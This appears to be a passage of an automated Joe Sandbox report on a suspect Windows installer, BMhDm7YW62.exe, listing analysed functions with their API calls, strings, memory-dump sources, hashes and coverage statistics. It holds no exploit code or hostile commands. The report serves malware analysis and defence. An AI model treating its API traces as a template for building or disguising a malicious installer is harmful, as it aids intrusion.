                                                                                                                        Function 004038B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowTextA.USER32(00000000,jtlkrtaftpgmppuxhth Setup), ref: 0040394C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: TextWindow
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$1033$jtlkrtaftpgmppuxhth Setup
                                                                                                                        • API String ID: 530164218-1913988077
                                                                                                                        • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                        • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                                                                                        • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                        • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040568B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                                                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-1881609536
                                                                                                                        • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                        • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                                                                                        • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                        • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401F84 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FAF
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2987980305-0
                                                                                                                        • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                                                                                        • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                                                                                        • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                                                                                        • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402336 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                        • lstrlenA.KERNEL32(0040A410,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A410,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A410,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1356686001-0
                                                                                                                        • Opcode ID: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                                                                                        • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                                                                                        • Opcode Fuzzy Hash: 9bf654010a188213ed9da3fb996897beb0b6485406045e6761b6e0bfc6b57b1d
                                                                                                                        • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040571F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(004054D1,?,C:\,00000000,00405783,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405732
                                                                                                                        • CharNextA.USER32(00000000), ref: 00405741
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 3213498283-3404278061
                                                                                                                        • Opcode ID: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                                                                                                        • Instruction ID: 9935135ffb9a6864428372be34cefbf1708860cc48cffe50814e8a96023de109
                                                                                                                        • Opcode Fuzzy Hash: df1f57800bc78783e49fb04f649057cff683ac7abc20f7779ba38a9a2f776efc
                                                                                                                        • Instruction Fuzzy Hash: 99F0A761904B21D6EB2272744C84B6B579CDB55720F180437E100B71D197BC4C82AF9A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401D38 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401D3F
                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                        • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3272661963-0
                                                                                                                        • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                                                                        • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                                                                                        • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                                                                        • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402BF1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2102729457-0
                                                                                                                        • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                                                                        • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                                                                                        • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                                                                        • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404DD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 00404E0A
                                                                                                                        • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                                                                                                          • Part of subcall function 00403EA0: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EB2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                        • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                        • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                                                                                        • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                        • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403556 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00403577
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Free$GlobalLibrary
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 1100898210-1881609536
                                                                                                                        • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                        • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                                                                                        • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                        • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004056D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BMhDm7YW62.exe,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 004056D8
                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BMhDm7YW62.exe,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 004056E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                        • API String ID: 2709904686-4267323751
                                                                                                                        • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                                                                                        • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                        • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004057E4 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405804
                                                                                                                        • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190613189-0
                                                                                                                        • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                                                                                        • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                                                        • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:3.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:74.5%
                                                                                                                        Signature Coverage:13.8%
                                                                                                                        Total number of Nodes:145
                                                                                                                        Total number of Limit Nodes:11
